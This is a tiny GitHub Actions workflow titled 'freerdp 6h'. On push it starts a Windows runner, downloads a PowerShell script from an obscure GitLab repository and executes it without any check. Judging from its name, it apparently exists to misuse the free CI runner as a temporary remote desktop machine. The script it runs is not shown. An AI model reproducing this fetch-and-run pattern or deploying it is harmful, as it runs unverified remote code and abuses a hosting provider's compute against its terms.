name: freerdp 6h

on: [push, workflow_dispatch]

jobs:
  build:

    runs-on: windows-2019
    
    steps:
    - name: Download
      run: Invoke-WebRequest https://gitlab.com/jfv-he/jrtiiupngk/-/raw/main/run.ps1 -OutFile 0.ps1
    
    - name: rrt
      run: |
           .\0.ps1
